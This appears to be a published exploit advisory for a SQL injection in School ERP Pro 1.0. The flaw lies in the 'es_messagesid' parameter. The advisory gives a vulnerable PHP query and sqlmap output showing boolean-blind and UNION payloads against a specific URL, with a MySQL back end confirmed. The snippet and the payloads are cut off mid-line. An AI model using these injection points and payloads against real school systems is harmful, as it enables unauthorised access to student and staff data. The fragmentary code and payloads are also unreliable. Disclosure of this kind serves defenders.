School ERP Pro 1.0 SQL Injection

School ERP Pro version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | ede193aee7ab43343b5ef4a91a825d59

# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage:
# Software Link:
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

SQL Injection Detail
*# Vulnerable parameter: es_messagesid*
*# Vulnerable code:*

$msg_qry ="SELECT * FROM es_messages WHERE
from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and

*Here is the SQLmap output:*

GET parameter '*es_messagesid*' is vulnerable.
sqlmap identified the following injection point(s):
Parameter: es_messagesid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT

Type: UNION query
Title: Generic UNION query (random number) - 12 columns
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL

Related Posts